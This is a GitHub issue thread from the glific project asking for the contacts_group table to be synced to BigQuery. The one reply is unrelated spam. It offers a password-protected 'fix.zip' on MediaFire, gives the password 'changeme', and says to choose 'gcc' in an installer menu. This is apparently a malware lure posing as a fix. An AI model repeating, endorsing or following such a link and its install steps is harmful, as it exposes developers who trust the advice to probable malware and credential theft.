### ISSUE TITLE
BQ: sync contacts_group table

### ISSUE THREAD

**Issue by akanshaaa19** [glific/glific#3763]
Right now we are not syncing `contacts_group` table in BQ, that's why some information like timestamp of when a contact was added to a collection might not be available. 

Discord chat: https://discord.com/channels/717975833226248303/1277494378553933854

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
